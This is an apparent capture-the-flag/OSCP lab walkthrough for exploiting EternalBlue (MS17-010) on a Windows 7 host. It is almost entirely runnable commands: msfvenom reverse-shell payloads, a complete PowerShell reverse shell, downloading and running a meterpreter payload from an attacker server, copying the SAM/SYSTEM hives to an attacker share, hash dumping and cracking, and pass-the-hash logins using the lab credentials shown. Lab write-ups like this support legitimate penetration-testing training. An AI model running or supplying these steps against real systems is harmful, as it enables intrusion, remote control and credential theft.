Manual EternalBlue (MS17-010) Exploitation - OSCP Style

Target Information

• IP: 10.201.77.101
• OS: Windows 7 Professional 7601 Service Pack 1 x64
• Vulnerable Services: SMB (ports 139, 445)
• Vulnerabilities: MS17-010 (EternalBlue), MS12-020 (RDP)

Step 1: Initial Reconnaissance

# Port scan
nmap -sV -sC --script vuln -Pn -oN nmap.txt 10.201.77.101 --open

# SMB enumeration
smbclient -L //10.201.77.101 -N
enum4linux -a 10.201.77.101

Step 2: Manual EternalBlue Exploitation

Method 1: Using AutoBlue-MS17-010 (Python Script)

# Clone the repository
git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
cd AutoBlue-MS17-010

# Check if target is vulnerable
python eternal_checker.py 10.201.77.101

# Generate shellcode (replace LHOST with your IP)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.136.212 LPORT=4444 -f raw -o sc_x64.bin

# Alternative: Generate meterpreter payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.8.136.212 LPORT=4444 -f raw -o sc_x64_met.bin

# Start listener
nc -lvnp 4444

# Execute exploit
python eternalblue_exploit7.py 10.201.77.101 sc_x64.bin

Method 2: Using MS17-010 Python Script

# Clone different EternalBlue implementation
git clone https://github.com/worawit/MS17-010.git
cd MS17-010

# Check vulnerability
python checker.py 10.201.77.101

# Generate payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.136.212 LPORT=4444 -f raw > shell.bin

# Start listener
nc -lvnp 4444

# Execute exploit (for Windows 7 x64)
python eternalblue_exploit7.py 10.201.77.101 shell.bin

Step 3: Manual Shell Upgrade (Without Metasploit)

Upgrade to Meterpreter Manually

# Generate meterpreter payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.8.136.212 LPORT=4445 -f exe -o meterpreter.exe

# Start HTTP server to serve payload
python3 -m http.server 8080

# Start meterpreter handler
msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.8.136.212; set lport 4445; exploit"

In your shell:

# Download payload (from your shell)
powershell -c "Invoke-WebRequest -Uri http://10.8.136.212:8080/meterpreter.exe -OutFile C:\temp\met.exe"

# Execute payload
C:\temp\met.exe

Alternative: PowerShell Reverse Shell

# Create PowerShell reverse shell script
cat > shell.ps1 << 'EOF'
$client = New-Object System.Net.Sockets.TCPClient("10.8.136.212",4445);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + "PS " + (pwd).Path + "> ";
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()
}
$client.Close()
EOF

# Start listener
nc -lvnp 4445

# Execute in your shell
powershell -ExecutionPolicy Bypass -File shell.ps1

Step 4: Post-Exploitation Activities

System Information Gathering

# System info
systeminfo
whoami
whoami /priv
net users
net localgroup administrators

# Network information
ipconfig /all
netstat -an
arp -a

Hash Extraction (Manual)

# Navigate to system directory
cd C:\Windows\System32\config

# Copy SAM and SYSTEM files
copy SAM C:\temp\SAM
copy SYSTEM C:\temp\SYSTEM
copy SECURITY C:\temp\SECURITY

Transfer files to Kali

# On Kali - start SMB server
impacket-smbserver share /tmp -smb2support

# On Windows - copy files
copy C:\temp\SAM \\10.8.136.212\share\SAM
copy C:\temp\SYSTEM \\10.8.136.212\share\SYSTEM

Extract hashes on Kali

# Extract hashes using impacket
impacket-secretsdump -sam SAM -system SYSTEM LOCAL

# Crack with John
john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

Step 5: Flag Collection

# Search for flags
dir /s /b C:\*flag*.txt

# Collect flags
type C:\flag1.txt
type C:\Windows\System32\config\flag2.txt
type C:\Users\Jon\Documents\flag3.txt

Alternative Methods

Method 3: Using Impacket's psexec

# After getting credentials
impacket-psexec jon:alqfna22@10.201.77.101

# Or with hash
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d jon@10.201.77.101

Method 4: WinRM (if enabled)

# Check if WinRM is available
nmap -p 5985,5986 10.201.77.101

# Connect using evil-winrm
evil-winrm -i 10.201.77.101 -u jon -p alqfna22

Key Differences from Metasploit Approach

1. Manual payload generation: Using msfvenom instead of automatic payload handling
2. Manual listeners: Using netcat or manual handler setup
3. Manual file transfers: Using PowerShell, SMB, or HTTP servers
4. Manual privilege escalation: Manual enumeration and exploitation
5. Manual persistence: Setting up manual backdoors if needed

Important Notes

• Always ensure your LHOST is correctly set to your VPN IP
• Test connectivity between attacker and target
• Some exploits may require multiple attempts
• Always verify your payload architecture matches the target (x64 in this case)
• Consider ASLR/DEP bypass techniques if standard exploits fail

Commands Summary

# Quick exploitation workflow
git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
cd AutoBlue-MS17-010
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f raw -o sc_x64.bin
nc -lvnp 4444
python eternalblue_exploit7.py 10.201.77.101 sc_x64.bin